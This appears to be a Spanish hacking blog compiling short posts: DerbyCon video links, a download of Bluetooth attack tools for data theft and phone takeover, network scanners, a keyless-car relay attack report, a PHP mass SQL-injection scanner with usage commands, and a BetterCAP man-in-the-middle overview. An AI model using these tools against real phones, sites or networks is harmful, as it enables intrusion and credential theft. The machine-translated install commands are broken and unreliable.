Derbycon es la nueva conferencia hacker que se realiza en Louisville, Kentucky durante la ultima semana de septiembre, la primera derbycon se realizo en el 2011 con más de 1,100 asistentes, este año se realizo la numero 4.

Pueden ver los videos de las conferencias en los siguientes enlaces, donde se pueden encontrar cosas muy interesantes como Bypassing Internet Explorer's XSS Filter, Abusing Active Directory in Post-Exploitation, conferencias de la mano de Kevin Mitnick, HD moore... etc.



DerbyCon 1.

http://www.irongeek.com/i.php?page=videos/derbycon1/mainlist

DerbyCon 2.

http://www.irongeek.com/i.php?page=videos/derbycon2/mainlist

DerbyCon 3.

http://www.irongeek.com/i.php?page=videos/derbycon3/mainlist

DerbyCon 4.

http://www.irongeek.com/i.php?page=videos/derbycon4/mainlist


 


La imagen puede contener: texto 



Bluejacking Tools

Variadas Herramientas de BlueJacking capaces de realizar ataques por Bluetooth, del tipo BlueBug, BlueSnarf, HeloMoto, OBEX Object Push, Robo de Informacion, Envio de Mensajes, Control total del telefono, entre otras.

Tenemos:

- Bloover II
- Bloover II - Breever Edition
- Bluetooth Messenger
- BT File Manager ES *
- BT Browser
- Chat2U
- DJK-Bluevoice
- EasyJack v 2
- MiyuX
- MSocius BlueChat
- Super Bluetooth Hack (BT Info) ES *
- STMBlueS

    descargar: http://www.mediafire.com/?8t3pyvno2avsa5o




angry ip scanner

La imagen puede contener: texto 

Laboratorio angry ip scanner


Angry IP Scanner (o simplemente IPScan) es un escáner de red multiplataforma de código abierto y está diseñado para ser rápido y fácil de usar. Escanea direcciones IP y puertos, así como tiene muchas otras características.

Es ampliamente utilizado por los administradores de red y los usuarios curiosos de todo el mundo, incluyendo grandes y pequeñas empresas, los bancos y las agencias gubernamentales.

Se ejecuta en Linux, Windows y Mac OS X, posiblemente, el apoyo a otras plataformas también.

angry ip scanner nos facilita algunas tareas cuando estamos escaneando redes,
como por ejemplo realizar un ping en determinadas ip encontradas, realizar un tracerout asi como una geo localización muy sencilla, es una herramienta que no debe faltar conocer en nuestro backtrack o en nuestras tareas de pentester


Dispocitivo que Rompe la seguridad del Un coche O vehiculo.

No hay texto alternativo automático disponible. 



Un dispositivo de radio de $ 22 para romper el sistema de seguridad del coche
Cracking los sistemas de seguridad inalámbrica de los coches se ha hecho en el pasado varias veces, pero ahora los investigadores de Qihoo 360 mostró que es un pedazo de pastel si tiene el dispositivo adecuado. Para bien o para mal, los investigadores de una empresa de seguridad con sede en Beijing, Qihoo 360, construyeron un gadget que puede pasar por alto los sistemas de seguridad de los automóviles, ¡esencialmente dejando el coche a merced de los ladrones!
El dispositivo de $ 22:

Unas pocas antenas, transmisores y baterías y por supuesto las mentes brillantes de los investigadores de seguridad de Qihoo 360 es la receta del dispositivo de radio. ¡Simple, barato pero altamente eficaz!

Sí, varios dispositivos se han hecho en el pasado como este, pero ninguno de ellos era tan barato. ¡Ninguno de ellos! Además, este dispositivo se puede decir que es una versión "actualizada" de cualquier dispositivo anterior de este tipo, ya que estos dispositivos pueden transmitir las señales de más de 1000 pies! Esto demuestra que como las empresas de tecnología están constantemente tratando de hacer nuevos productos, los hackers se mantienen al día con ellos en la búsqueda de vulnerabilidades en esos dispositivos

El mecanismo de ataque

Lo que este dispositivo hace es, engaña el sistema del coche en la creencia de que el fob está cerca. Los ladrones pueden simplemente copiar la señal fob de la llave del propietario a través de un dispositivo, y luego utilizar el otro para transmitir la misma señal exacta al sistema de entrada sin llave del coche de destino.

El experimento

Los investigadores de Qihoo 360, hackeado en dos vehículos - un híbrido de Qing y Chevrolet Captiva SUV con facilidad pero señalaron que los varios otros coches que usan el sistema de entrada de NXP también podrían ser comprometidos.

En respuesta, un funcionario de NXP dijo: "Los fabricantes de automóviles y los integradores de sistemas de acceso de automóviles están introduciendo soluciones que contrarresten estos ataques".
Una solución sencilla

Los investigadores de seguridad no sólo señaló los defectos en los sistemas de entrada de los coches, también compartieron un método simple para mantenerse a salvo de este tipo de ataques. Sin embargo, esta no es la primera vez cuando un grupo de hackers chinos ha demostrado cómo hackear y controlar un coche puede ser un pedazo de pastel. Hace apenas unos meses, los investigadores de Keen Security Lab, con sede en China, demostraron cómo podían controlar los frenos de Tesla desde 12 millas de distancia.


Escáner de masa de inyección sql

La imagen puede contener: texto


Escáner de masa de inyección sql


Esta herramienta puede comprobar una lista de sitios web y ver si son vulnerables a la inyección sql. No tomo ninguna responsabilidad por este uso de herramientas con fines maliciosos. Es libre y de código abierto para todos.
Esta herramienta puede chequear una lista de sitio webs y ver si son vulnerables a las inyecciones SQL. No asumo ninguna responsabilidad por el uso de esta herramienta con fines maliciosos.
Uso


Php sqli-Mass-Escáner. Lista de php-L. Txt (la lista debe estar en el mismo directorio que la herramienta)

Php sqli-Mass-Escáner. Php-u http://www.site.com/index.php?id=2 (necesidad de poner http:// y www. Para obtener el resultado con éxito)

Requisitos:

Ubuntu: sudo apt-consigue instalar php7 && sudo apt-consigue instalar php7-Curl

Windows: instalar appserver / Xampp / Easyphp / wampserver para poder ejecutar la herramienta.






Malcom





No hay texto alternativo automático disponible.



Malcom es una herramienta diseñada para analizar la comunicación de red de un sistema mediante representaciones gráficas del tráfico de red y hacer referencias cruzadas con fuentes de malware conocidas. Esto resulta práctico cuando se analiza cómo ciertas especies de malware tratan de comunicarse con el mundo exterior.

Malcom puede ayudarle:

Detectar servidores centrales de control y comando (C & C)
Entender las redes peer-to-peer
Observar las infraestructuras DNS de flujo rápido
Determinar rápidamente si un artefacto de red es "conocido-malo"


Descargar: https://github.com/tomchop/malcom







sábado, 26 de agosto de 2017




BetterCAP es una de las mejores herramientas para realizar ataques Man In The Middle de todos los tipos. Esta herramienta es capaz de manipular en tiempo real el tráfico HTTP, HTTPS y las conexiones TCP, todo ello para robar credenciales, hacerse pasar por otros equipos y mucho más. La nueva versión BetterCAP incorpora importantes novedades para las auditorías, a continuación, os explicamos todas las nuevas funcionalidades.

Nuevas características en BetterCAP 1.6.2

Aunque BetterCAP es una de las herramientas más completas que existen hoy en día, el equipo de desarrollo ha ido incorporando cada vez más y más funcionalidades. En esta última versión se ha incorporado un spoofer de MAC, de esta manera, un atacante podrá spoofear la dirección MAC de una víctima para hacerse pasar por él en la misma red local.

Otra novedad que ha incorporado BetterCAP es la compatibilidad con el protocolo Hot Standby Router Protocol, o también conocido HSRP. Este protocolo es propietario de Cisco y permite el despliegue de routers redundantes en la red, de esta manera, nuestra arquitectura será tolerante a fallos en una red. Este protocolo evita la existencia de puntos de fallos únicos en la red, comprueba continuamente si el otro router sigue “vivo”, y en caso de que el router maestro deje de funciona, empezará a funcionar el esclavo automáticamente. BetterCAP ha incorporado la funcionalidad de sniffer al protocolo HSRP, de esta forma, recibirá todos los mensajes que se intercambian entre los dos o más routers de HSRP para saber en todo momento qué ocurre en la red. También han añadido la capacidad de spoofer, de esta forma, el equipo del atacante se podría hacer pasar por un router con HSRP.
¿Qué peligro hay porque un atacante se haga pasar por un router HSRP? Pues que podrá enviar mensajes al resto de routers del grupo standby, y de esta manera, hacerse con el control de la red entera porque podría enviar un mensaje para ascender a router maestro (siempre y cuando no tengamos activado el preemption activado, y siempre y cuando no tengamos activada la autenticación en HSRP).
Otras novedades incorporadas en esta nueva versión es que actúa como sniffer de RADIUS, al protocolo Bidirectional Forwarding Detection o también conocido como BFD, sniffer de Wake ON LAN o también conocido como WOL, Asterisk y TeamTalk. Otras mejoras ha sido que tenemos nuevos agentes para WSD, UPnP, mDNS y SSDP. Por último, también se han mejorado el rendimiento del logger, de esta forma, consumirá menos recursos del sistema al ser más eficiente.
Podéis visitar la página web oficial de BetterCAP, donde no solo encontraréis las principales características de este completo software, sino también una completa Wiki con varios manuales y ejemplos de cómo utilizar esta herramienta tan útil. También podéis acceder al proyecto oficial de BetterCAP en GitHub, donde encontraréis todo el código fuente del proyecto.
Os recomendamos acceder a nuestra sección de redes y de seguridad informática donde encontraréis una gran cantidad de manuales para asegurar vuestra red, y también vuestros equipos informáticos.